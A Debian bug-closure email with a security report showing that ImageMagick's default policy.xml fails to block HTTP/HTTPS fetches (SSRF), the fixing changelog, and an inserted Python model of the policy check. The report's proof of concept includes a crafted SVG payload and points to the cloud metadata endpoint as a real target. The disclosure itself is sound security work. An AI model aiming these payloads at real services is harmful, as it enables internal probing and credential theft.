Your message dated Sun, 21 Jun 2026 19:17:06 +0000
with message-id <[email protected]>
and subject line Bug#1140176: fixed in imagemagick 8:7.1.1.43+dfsg1-1+deb13u10
has caused the Debian Bug report #1140176,
regarding imagemagick: default policy.xml HTTP/HTTPS/URL delegate rules are no-ops (SSRF, CWE-918)
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)
--
1140176: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1140176
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: imagemagick
Version: 8:7.1.2.15+dfsg1-2
Severity: grave
Tags: security patch
Dear Maintainer,
The default ImageMagick security policy shipped by Debian in
debian/patches/0005-Add-a-debian-policy.patch
(installed as /etc/ImageMagick-7/policy.xml) attempts to block remote
HTTP/HTTPS/URL access -- the standard SSRF mitigation -- with these rules:
<policy domain="delegate" rights="none" pattern="URL" />
<policy domain="delegate" rights="none" pattern="HTTPS" />
<policy domain="delegate" rights="none" pattern="HTTP" />
These rules are silently ineffective, so a default install still performs
outbound HTTP/HTTPS requests and is vulnerable to SSRF (CWE-918).
Root cause
----------
The http:/https: coders fetch URLs by invoking delegates named
"http:decode" / "https:decode" (coders/url.c). InvokeDelegate()
(MagickCore/delegate.c) enforces the "delegate" policy by glob-matching
the policy pattern against that full identifier string. The pattern
"HTTP" (no wildcards) does not match the literal string "http:decode",
so the rule is treated as inapplicable and the default (allow) wins.
The patterns "HTTP", "HTTPS" and "URL" therefore never block the URL
coders.
The "@*" path rule in the same file is enforced through a different code
path and does work, which gives operators false confidence that the
HTTP/HTTPS/URL restriction is also working.
Proof of concept
----------------
All commands run against the unmodified, as-installed policy.xml.
1. Minimal listener:
python3 -c 'import http.server,socketserver
class H(http.server.BaseHTTPRequestHandler):
    # log the requested path, then answer with a minimal GIF header
    def do_GET(s):
        print("SSRF:",s.path); s.send_response(200)
        s.end_headers(); s.wfile.write(b"GIF89a;")
    def log_message(s,*a): pass
socketserver.TCPServer(("127.0.0.1",7777),H).serve_forever()'
2. Confirm the restrictive policy is active (this is correctly blocked):
echo x > /tmp/q.txt
magick label:@/tmp/q.txt /tmp/q.png
-> magick: attempt to perform an operation not allowed by the security policy `@/tmp/q.txt'
3. PoC 1 -- direct URL coder:
magick http://127.0.0.1:7777/ssrf out.png
-> listener logs: SSRF: /ssrf
4. PoC 2 -- SSRF via untrusted SVG (the realistic web-service vector):
printf '<svg xmlns:xlink="http://www.w3.org/1999/xlink" width="10"
height="10"><image xlink:href="http://127.0.0.1:7777/svg-ssrf" width="10"
height="10"/></svg>' > evil.svg
magick evil.svg out.png
-> listener logs: SSRF: /svg-ssrf
Both requests are sent despite the delegate rights="none" rules.
Substituting a real internal target (e.g.
http://169.254.169.254/latest/meta-data/) demonstrates real impact.
Impact
------
A service that thumbnails or converts user-supplied SVG (or URL) input
with ImageMagick can be coerced into attacker-controlled server-side
requests to internal services or cloud metadata endpoints, enabling
credential theft and internal port/host scanning. The exposure is worse
because operators believe they are protected: they deployed a policy
that explicitly lists HTTP, HTTPS and URL as forbidden.
Suggested fix
-------------
Replace the ineffective delegate rules with the coder-domain form, which
is enforced and covers every remote scheme:
<policy domain="coder" rights="none"
pattern="{HTTP,HTTPS,FTP,FTPS,URL,MSL,MVG}" />
(keeping the existing @* path rule). Verify with:
magick http://127.0.0.1:1/x x.png
which must be rejected by policy, not merely fail to connect.
Bastien Rouccaries has already prepared a fix; a CVE request is in
progress. I am filing here at the request of the Debian Security Team so
the fix is tracked in the BTS.
Tested on imagemagick 8:7.1.2.15+dfsg1-2; applies generally to the
ImageMagick 7.x series.
Regards,
Maram Sai Harsha Vardhan Reddy
Security Researcher
[email protected]
--- End Message ---
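The policy evaluation the report describes, modelled as an added Python example (not ImageMagick's or Debian's code): it loads the shipped delegate rules together with the proposed coder-domain rule, approximates GlobExpression with fnmatch plus brace expansion, and flags delegate patterns that carry no glob metacharacters. Assumptions: matching is case-sensitive, a later matching rule overrides an earlier one, and no matching rule means allow.

```python
import fnmatch
import re
import xml.etree.ElementTree as ET

# Constructed excerpt: Debian's shipped rules plus the coder-domain rule the
# report proposes, so both forms can be evaluated side by side.
POLICY_XML = """<policymap>
  <policy domain="path" rights="none" pattern="@*"/>
  <policy domain="delegate" rights="none" pattern="URL"/>
  <policy domain="delegate" rights="none" pattern="HTTPS"/>
  <policy domain="delegate" rights="none" pattern="HTTP"/>
  <policy domain="coder" rights="none" pattern="{HTTP,HTTPS,FTP,FTPS,URL,MSL,MVG}"/>
</policymap>"""


def expand_braces(pattern):
    """Expand {a,b,...} alternation into plain fnmatch globs."""
    m = re.search(r"\{([^{}]*)\}", pattern)
    if m is None:
        return [pattern]
    head, tail = pattern[:m.start()], pattern[m.end():]
    return [g for alt in m.group(1).split(",") for g in expand_braces(head + alt + tail)]


def load_rules(xml_text):
    """Return (domain, rights, pattern) triples in document order."""
    root = ET.fromstring(xml_text)
    return [(p.get("domain"), p.get("rights"), p.get("pattern")) for p in root.iter("policy")]


def is_allowed(rules, domain, identifier):
    """Model of the policy check: glob every rule of the domain against the
    identifier the caller supplies (e.g. "http:decode" for the delegate domain).
    Assumption: a later matching rule overrides an earlier one; no match => allow."""
    decision = True  # ImageMagick's default when no rule applies is to permit
    for rule_domain, rights, pattern in rules:
        if rule_domain != domain:
            continue
        if any(fnmatch.fnmatchcase(identifier, g) for g in expand_braces(pattern)):
            decision = rights != "none"  # rights="none" denies, anything else permits
    return decision


def dead_delegate_rules(rules):
    """Delegate patterns without *, ?, [ or { match only an identifier that equals
    the pattern, never a 'scheme:decode' string: such rules are no-ops."""
    return [pat for dom, _, pat in rules
            if dom == "delegate" and re.search(r"[*?\[{]", pat) is None]
```

Evaluating the three identifiers from the report reproduces its findings: the delegate rules leave "http:decode" permitted, the "@*" path rule denies "@/tmp/q.txt", and the coder-domain rule denies "HTTP".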
--- Begin Message ---
Source: imagemagick
Source-Version: 8:7.1.1.43+dfsg1-1+deb13u10
Done: Bastien Roucariès <[email protected]>
We believe that the bug you reported is fixed in the latest version of
imagemagick, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Bastien Roucariès <[email protected]> (supplier of updated imagemagick package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])
Format: 1.8
Date: Sat, 20 Jun 2026 13:35:39 +0200
Source: imagemagick
Architecture: source
Version: 8:7.1.1.43+dfsg1-1+deb13u10
Distribution: trixie-security
Urgency: high
Maintainer: ImageMagick Packaging Team
<[email protected]>
Changed-By: Bastien Roucariès <[email protected]>
Closes: 1140176
Changes:
imagemagick (8:7.1.1.43+dfsg1-1+deb13u10) trixie-security; urgency=high
.
* Fix CVE-2026-48724:
When using an image with a mask, the Floyd-Steinberg dithering
method will cause a negative heap buffer over-write
* Fix CVE-2026-48734:
A crafted MVG file could result in a stack overflow due to a missing depth
or visited-set check
* Fix CVE-2026-48994:
A missing check of a return value could lead to a heap buffer over-write
in the MAT decoder on 32-bit systems.
* Fix CVE-2026-49218:
A missing check in the DCM decoder could result in an image with invalid
dimensions, and that could cause crashes in other operations.
* Fix CVE-2026-49219:
An incorrect parsing of the filename can result in a policy bypass and
read files disallowed by a security policy using a symlink
* Backport policy from 7.1.2.25
* Fix CVE-2026-53460:
A missing check for maximum memory request in AcquireAlignedMemory
could trigger an out-of-memory condition.
* Fix CVE-2026-53461:
An incorrect loop in the ICON decoder can result in an out of
bounds heap write resulting in a crash.
* Fix CVE-2026-53463:
When passing incorrect arguments in the distort operation a
null pointer dereference will occur.
* Fix CVE-2026-53464:
When providing invalid options to the wand option parser
a small memory leak will occur.
* Harden debian policy in case of custom recompilation (Closes: #1140176)
--- End Message ---